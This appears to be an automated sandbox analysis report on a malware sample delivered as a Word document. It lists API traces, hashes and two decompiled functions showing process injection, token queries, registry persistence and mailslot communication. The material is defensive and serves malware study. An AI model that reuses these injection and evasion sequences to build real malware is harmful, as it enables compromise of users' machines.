  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches: 193
Initial sample Analysis ID: 60981
Initial sample SHA 256: 93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name: Request_592655.doc

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 96fc59e142f8f3589546cfe20ec42451b64ec7524ff1705d84ef22f3f4a31ef3
  • Instruction ID: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
  • Opcode Fuzzy Hash: 29219E03028ED390CA255D8305A2B932155DF81F53C6CE3F474BCB66855F51BE1A5789
  • Instruction Fuzzy Hash: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B343CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01B343E1
  • CloseHandle.KERNEL32(?), ref: 01B343F8
  • StrRChrA.SHLWAPI(01B311A6,00000000,0000005C), ref: 01B34404
  • lstrcat.KERNEL32(01B311A6,01B3825D), ref: 01B3443E
  • FindFirstFileA.KERNELBASE(01B311A6,?), ref: 01B34454
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34486
  • StrChrA.SHLWAPI(?,0000002E), ref: 01B344F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 01B3452D
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34542
  • CompareFileTime.KERNEL32(?,?), ref: 01B3456B
  • HeapFree.KERNEL32(00000000,00000000,01B38049), ref: 01B345A1
  • HeapFree.KERNEL32(00000000,01B311A6), ref: 01B345B1
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}
APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}
APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 6
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-3916222277
